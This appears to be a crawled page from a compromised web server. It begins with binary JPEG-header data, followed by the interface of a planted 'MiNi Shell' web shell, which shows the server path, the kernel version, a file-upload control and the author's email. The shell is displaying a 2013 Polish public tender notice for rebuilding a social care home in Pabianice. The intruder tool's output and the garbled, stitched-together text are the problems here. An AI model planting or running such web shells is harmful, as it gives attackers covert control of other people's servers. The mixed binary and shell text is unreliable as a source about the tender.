JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130620/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130620/236528-N-2013.html

<p class="kh_header"><b>Pabianice: Przebudowa Domu Pomocy Społecznej 
w Pabianicach ul. Łaska 86</b><br>
<b>Numer ogłoszenia: 236528 - 2013; data zamieszczenia: 20.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Pabianicach , ul. Wiejska 55/61, 95-200 Pabianice, woj. łódzkie, tel. 042 2137551, faks 042 2137640.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.pabianice-dps.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa Domu Pomocy Społecznej 
w Pabianicach ul. Łaska 86.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Przebudowa Domu Pomocy Społecznej 
w Pabianicach ul. Łaska 86  mająca na celu zmianę sposobu użytkowania I piętra budynku.  Zmiana ta ma polegać na dostosowaniu pokojów mieszkalnych wraz z łazienkami i korytarzem  dla potrzeb osób leżących, wymagających intensywnej pielęgnacji.
	Przedmiot zamówienia jest opisany w specyfikacji istotnych warunków zamówienia, oraz w dokumentacji technicznej, przedmiarze robót i  w specyfikacji wykonania i odbioru robót, które są załącznikami do specyfikacji. Na realizację przedmiotu zamówienia Zamawiający posiada pozwolenie na budowę.  Zakres prac stanowiących przedmiot zamówienia i dotyczących  I pietra budynku Domu Pomocy Społecznej w Pabianicach ul. Łaska 86 obejmuje między innymi:
- roboty budowlane w skład których wchodzi między innymi:
- rozebranie ścianek działowych w pokojach,
- rozebranie podkładu - wylewek betonowych do poziomu płyt kanałowych
- zdemontowanie urządzeń sanitarnych i mebli w kuchniach i łazienkach,
- zdemontowanie grzejników co,
- wykonanie otworów drzwiowych dla drzwi wejściowych dwuskrzydłowych,
- wykonanie izolacji podłóg z wylewką w pomieszczeniach,
- wyburzenie  ścianek między łazienkami a pokojami,
- wykonanie nowych ścianek i tynkowanie rozkuć,
- ułożenie płytek podłogowych antypoślizgowych w łazienkach wraz z odpowiednim  
  wyprofilowaniem  odpływu wody z posadzki, 
- ułożenie glazury na ściankach łazienek do sufitu,
- w pokojach i na korytarzu ułożenie wykładziny zmywalnej PCV,
- na ścianach w pokojach i w korytarzu zamontowanie odbojnic o szer.0,5 m z pochwytami,
- malowanie pomieszczeń farbą emulsyjną,
- montaż pochwytów dla osób niepełnosprawnych w łazienkach,

- roboty instalacyjne elektryczne i wodno - kanalizacyjne, w skład których wchodzi między innymi:
- zmodernizowanie instalacji c.o. i wod. - kan. wraz z montażem nowych podejść do 
  urządzeń łazienkowych oraz montażem nowych grzejników i armatury, 
- zmodernizowanie i rozbudowanie instalacji elektrycznej wewnątrz pomieszczeń wraz z  
  zamontowaniem oświetlenia oraz  niezbędnych urządzeń i armatury, 
- wykonanie niezbędnych badań wymaganych stosownymi przepisami,
- wykonanie instalacji przyzywowej dźwiękowej i świetlnej i podłączenie jej do centralki.
	
Uwaga:  Wszystkie roboty należy wykonać zgodnie z dokumentacją oraz załączonymi do niej szczegółowymi rysunkami dotyczącymi usytuowania wszystkich elementów łazienek w taki sposób, by spełnić wymogi związane z przystosowaniem tych pomieszczeń do  użytkowania ich przez  osoby  niepełnosprawne.
Wszystkie roboty budowlane i instalacyjne powinny być wykonane zgodnie z zasadami sztuki budowlanej,  warunkami technicznymi wykonania i odbioru robót budowlano-montażowych  i instalacyjnych. Materiały budowlane oraz zastosowane urządzenia powinny posiadać  aprobaty techniczne oraz odpowiadać  obowiązującym normom.
- roboty stolarskie, w skład których wchodzi między innymi 
- wykonanie i zabudowanie 9 szaf wnękowych (w każdym pokoju jedna) zgodnie z rysunkiem załączonym do specyfikacji.

Roboty nie przewidziane dokumentacją, a konieczne do wykonania przez Wykonawcę:
	- wyniesienie mebli z pomieszczeń remontowanych  i przeniesienie je w miejsce 
   wskazane przez Zamawiającego, a w przypadku mebli nie przewidzianych do   
   ponownego wykorzystania usunięcie ich z terenu Domu Pomocy Społecznej               
   w  Pabianicach ul. Łaska 86,
	- wstawienie mebli do pomieszczeń po zakończonej modernizacji,
- odgrodzenie części korytarza z pomieszczeniami, w których wykonywane   będą  
   prace od jego pozostałej części w ten sposób, by było możliwe        
   prowadzenie  tam normalnej działalności Domu Pomocy Społecznej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie wypełnienie i podpisanie   
oświadczenia stanowiącego załącznik nr 2 do specyfikacji istotnych warunków zamówienia i załączenie go do  
oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie wypełnienie, podpisanie oraz załączenie do oferty oświadczenia stanowiącego załącznik nr 4, w którym wykonawca musi potwierdzić wykonanie co najmniej 3  prac o podobnym charakterze co przedmiot zamówienia  (budowa, rozbudowa, modernizacja lub remont) dotyczący prac ogólnobudowlanych lub instalacyjnych w budynkach wielokondygnacyjnych w ciągu ostatnich 5 lat, o wartości co najmniej               300 000 PLN  brutto każda, zakończonych do dnia otwarcia ofert w niniejszym postępowaniu. 
Do załącznika należy dołączyć, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 lutego 2013r. (Dz.U. z dnia 19 lutego 2013r. poz.231) w sprawie rodzajów dokumentów, jakie można żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane, dowody dotyczące tych prac, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie wypełnienie i podpisanie   
oświadczenia stanowiącego załącznik nr 2 do specyfikacji istotnych warunków zamówienia i załączenie go do  oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie wypełnienie i podpisanie   
oświadczenia stanowiącego załącznik nr 2 do specyfikacji istotnych warunków zamówienia i załączenie go do  oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie wypełnienie i podpisanie   
oświadczenia stanowiącego załącznik nr 2 do specyfikacji istotnych warunków zamówienia i załączenie go do  oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku gdy do całkowitego wykonania przedmiotu zamówienia wystąpi konieczność wykonania robót nieprzewidzianych, czyli takich, które nie były uwzględnione w  dokumentacji technicznej lub w przedmiarze robót, a koniecznych do wykonania przedmiotu zamówienia, to roboty te rozliczone będą na podstawie kosztorysów powykonawczych przygotowanych przez wykonawcę, a zatwierdzonych przez inspektora nadzoru.  Kosztorysy te będą opracowane w oparciu o następujące założenia:
- czynniki cenotwórcze i ceny materiałów zostaną przyjęte z kosztorysów ofertowych,
- w przypadku gdy nie będzie możliwe rozliczenie danej roboty w oparciu 
o ceny zawarte w ofercie, brakujące ceny zostaną przyjęte 
z zeszytów SEKOCENBUD z kwartału poprzedzającego datę wystawienia protokółu odbioru,
- podstawą do określenia nakładów rzeczowych będą normy  zawarte 
w kosztorysie ofertowym, a w przypadku ich braku odpowiednie pozycje 
w KNR-ów. W przypadku braku odpowiednich pozycji w KNR-ach, zastosowana zostanie wycena indywidualna wykonawcy, zatwierdzona przez inspektora nadzoru.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pabianice-dps.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Pabianicach
95-200 Pabianice
ul. Wiejska 55/61.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2013 godzina 09:00, miejsce: Dom Pomocy Społecznej w Pabianicach
95-200 Pabianice
ul. Wiejska 55/61
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com